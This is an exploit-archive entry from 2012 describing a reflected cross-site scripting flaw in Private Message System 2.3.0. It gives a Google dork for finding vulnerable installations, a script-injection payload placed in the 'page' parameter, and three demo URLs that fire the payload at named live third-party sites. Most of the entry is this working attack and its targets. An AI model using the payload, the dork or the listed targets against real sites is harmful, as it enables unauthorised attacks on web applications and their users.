Private Message System 2.3.0 <= XSS Vulnerability

2012-12-17T00:00:00
ID 1337DAY-ID-19994
Type zdt
Reporter GoLd_M
Modified 2012-12-17T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Private Message System 2.3.0 <= XSS Vulnerability
# Date: 17/12/2012
# Author: GoLd_M (Libyan) Page FaceBook (http://www.facebook.com/pages/وَذَكِّـــرْ/337878286310383)
# Vendor: http://sourceforge.net/projects/pmsys/
# Version: 2.3.0
# Category:: XSS Vulnerability
# Google Dork: PMS 2.3.0 © PMS Dev Team 2001 - 2012. 
# Tested on: Xp SP 2
# Ex :[Private Message System 2.3.0]/index.php?page="><script>alert(1337);</script>
# Test : http://upload.traidnt.net/upfiles/4ul41244.jpg
# Demo:
# 01 :http://ptl.su/pms/index.php?page="><script>alert(1337);</script>
# 02 :http://qgcomedyshow.freehostia.com/community/mail/index.php?page="><script>alert(1337);</script>
# 03 :http://anti-spam-man.com/pmsys/pmsys-2.3.0/index.php?page="><script>alert(1337);</script>

#  0day.today [2018-04-04]  #